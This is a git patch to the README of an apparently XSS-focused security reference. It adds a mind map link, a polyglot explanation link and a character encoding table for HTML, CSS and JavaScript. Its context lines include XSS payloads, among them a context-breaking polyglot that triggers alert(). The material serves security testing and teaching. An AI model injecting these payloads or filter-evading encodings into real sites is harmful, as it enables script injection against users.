From fb19c953cb15a429e1afb3cda1cd4b89f996407a Mon Sep 17 00:00:00 2001
From: Somdev Sangwan <s0md3v@gmail.com>
Date: Thu, 8 Nov 2018 19:43:25 +0530
Subject: [PATCH] + Awesome XSS mind map, + Awesome Encoding

---
 README.md | 39 ++++++++++++++++++++++++++++++++++++++-
 1 file changed, 38 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index dd21d31..5c35b41 100644
--- a/README.md
+++ b/README.md
@@ -27,6 +27,9 @@ Put this repo on watch. I will be updating it regularly.
 - [BeEF](https://github.com/beefproject/beef)
 - [JShell](https://github.com/UltimateHackers/JShell)
 
+### Awesome XSS Mind Maps
+A beutiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)
+
 ### Awesome Payloads
 ```
 <d3"<"/onclick="1>[confirm``]"<">z
@@ -57,6 +60,8 @@ Here's an XSS polyglot that I made which can break out of 20+ contexts:
 %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
 ```
 
+Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)
+
 ### Awesome Tags & Event Handlers
 - [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
 - [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
@@ -260,7 +265,39 @@ If the your dummy tags lands in the source code as it is, go for any of these pa
 ```
 
 ### Awesome Encoding
-Come back later
+
+|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|
+|----|----|-------|-----------|----|--------|----------|
+|`&quot;`|"|`&#34;`|quotation mark|u+0022|\0022|\42|
+|`&num;`|#|`&#35;`|number sign|u+0023|\0023|\43|
+|`&dollar;`|$|`&#36;`|dollar sign|u+0024|\0024|\44|
+|`&percnt;`|%|`&#37;`|percent sign|u+0025|\0025|\45|
+|`&amp;`|`&|`&#38;`|ampersand|u+0026|\0026|\46|
+|`&apos;`|'|`&#39;`|apostrophe|u+0027|\0027|\47|
+|`&lpar;`|(|`&#40;`|left parenthesis|u+0028|\0028|\50|
+|`&rpar;`|)|`&#41;`|right parenthesis|u+0029|\0029|\51|
+|`&ast;`|*|`&#42;`|asterisk|u+002A|\002a|\52|
+|`&plus;`|+|`&#43;`|plus sign|u+002B|\002b|\53|
+|`&comma;`|,|`&#44;`|comma|u+002C|\002c|\54|
+|`&minus;`|-|`&#45;`|hyphen-minus|u+002D|\002d|\55|
+|`&period;`|.|`&#46;`|full stop; period|u+002E|\002e|\56|
+|`&sol;`|/|`&#47;`|solidus; slash|u+002F|\002f|\57|
+|`&colon;`|:|`&#58;`|colon|u+003A|\003a|\72|
+|`&semi;`|;`|`&#59;`|semicolon|u+003B|\003b|\73|
+|`&lt;`|<|`&#60;`|less-than|u+003C|\003c|\74|
+|`&equals;`|=|`&#61;`|equals|u+003D|\003d|\75|
+|`&gt;`|>|`&#62;`|greater-than sign|u+003E|\003e|\76|
+|`&quest;`|?|`&#63;`|question mark|u+003F|\003f|\77|
+|`&commat;`|@|`&#64;`|at sign; commercial at|u+0040|\0040|\100|
+|`&lsqb;`|\[|`&#91;`|left square bracket|u+005B|\005b|\133|
+|`&bsol;`|/\|`&#92;`|backslash|u+005C|\005c|\134|
+|`&rsqb;`|]|`&#93;`|right square bracket|u+005D|\005d|\135|
+|`&Hat;`|^|`&#94;`|circumflex accent|u+005E|\005e|\136
+|`&lowbar;`|_|`&#95;`|low line|u+005F|\005f|\137|
+|`&grave;`|\`|`&#96;`|grave accent|u+0060|\0060|\u0060|
+|`&lcub;`|{|`&#123;`|left curly bracket|u+007b|\007b|\173|
+|`&verbar;`|\||`&#124;`|vertical bar|u+007c|\007c|\174|
+|`&rcub;`|}|`&#125;`|right curly bracket|u+007d|\007d|\175|
 
 ### Awesome Tips & Tricks
 - `http(s)://` can be shortened to `//` or `/\\` or `\\`.